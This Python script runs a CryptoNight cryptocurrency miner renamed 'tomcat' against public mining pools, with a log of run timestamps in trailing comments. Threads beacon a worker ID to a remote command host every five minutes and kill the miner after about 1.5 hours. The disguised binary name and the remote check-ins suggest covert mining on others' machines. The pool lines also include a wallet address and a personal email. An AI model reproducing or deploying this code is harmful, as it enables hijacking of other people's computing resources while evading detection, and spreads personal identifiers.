import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:36:01.671761
#2018-02-17 17:24:03.835172
#2018-02-17 19:13:03.805148
#2018-02-17 21:01:06.376691
#2018-02-17 22:46:07.105661
#2018-02-18 00:31:05.834993
#2018-02-18 02:21:05.468780
#2018-02-18 04:08:05.882173
#2018-02-18 05:59:05.732224
#2018-02-18 07:50:02.111653
#2018-02-18 09:38:01.609540
#2018-02-18 11:24:02.134136
#2018-02-18 13:11:01.883787
#2018-02-18 14:59:03.979360
#2018-02-18 16:48:07.356694
#2018-02-18 18:36:06.783849
#2018-02-18 20:24:02.003846
#2018-02-18 22:10:03.600774
#2018-02-18 23:59:06.963164
#2018-02-19 01:45:07.596829
#2018-02-19 03:32:06.238272
#2018-02-19 05:17:01.383321
#2018-02-19 07:04:04.560283
#2018-02-19 08:53:01.647088
#2018-02-19 10:42:01.597157
#2018-02-19 12:31:01.725093
#2018-02-19 14:18:04.259032
#2018-02-19 16:08:10.114893
#2018-02-19 17:57:08.783037
#2018-02-19 19:45:09.372653
#2018-02-19 21:33:05.974123
#2018-02-19 23:19:02.130147
#2018-02-20 01:05:06.748052
#2018-02-20 02:55:07.680178
#2018-02-20 04:42:02.219277
#2018-02-20 06:26:06.647194
#2018-02-20 08:11:06.989349
#2018-02-20 09:56:08.183040
#2018-02-20 11:39:07.359858
#2018-02-20 13:26:05.475018
#2018-02-20 15:10:04.864233
#2018-02-20 16:54:08.636341
#2018-02-20 18:41:05.424118
#2018-02-20 20:31:07.221424
#2018-02-20 22:16:01.512597
#2018-02-21 00:01:08.307256
#2018-02-21 01:46:01.520139
#2018-02-21 03:35:03.853823
#2018-02-21 05:24:08.121522
#2018-02-21 07:12:03.686983
#2018-02-21 08:57:01.560777
#2018-02-21 10:43:11.071157
#2018-02-21 12:31:10.241096
#2018-02-21 14:18:07.602071
#2018-02-21 16:05:13.054787
#2018-02-21 17:56:06.049595
#2018-02-21 19:42:08.619824
#2018-02-21 21:32:01.736111
#2018-02-21 23:18:04.165694
#2018-02-22 01:08:01.782409
#2018-02-22 02:56:01.736401
#2018-02-22 04:43:05.312314
#2018-02-22 06:29:04.740268
#2018-02-22 08:16:06.402428
#2018-02-22 10:05:04.641970
#2018-02-22 11:49:01.949942
#2018-02-22 13:35:03.129124
#2018-02-22 15:23:04.278537
#2018-02-22 17:09:08.635585
#2018-02-22 18:56:05.487903
#2018-02-22 20:48:08.509230
#2018-02-22 22:34:06.378325
#2018-02-23 00:18:07.192909
#2018-02-23 02:07:08.913625
#2018-02-23 03:54:07.941962
#2018-02-23 05:31:03.735727
#2018-02-23 07:16:06.697353
#2018-02-23 09:21:04.387468
#2018-02-23 11:26:07.403950
#2018-02-23 13:17:07.585277
#2018-02-23 15:03:04.911281
#2018-02-23 16:53:09.024527
#2018-02-23 18:42:06.075285
#2018-02-23 20:28:07.230620
#2018-02-23 22:15:09.703349
#2018-02-24 00:01:07.303828
#2018-02-24 01:52:07.758071
#2018-02-24 03:46:06.514927
#2018-02-24 05:34:03.921282
#2018-02-24 07:20:07.455255
#2018-02-24 09:10:06.882046
#2018-02-24 11:05:05.718048
#2018-02-24 12:54:02.059020
#2018-02-24 14:42:01.403291
#2018-02-24 16:33:05.947157
#2018-02-24 18:22:07.322322
#2018-02-24 20:09:03.733137
#2018-02-24 21:53:06.877112
#2018-02-25 00:53:06.218574
#2018-02-25 04:43:01.903782
#2018-02-25 08:44:01.796881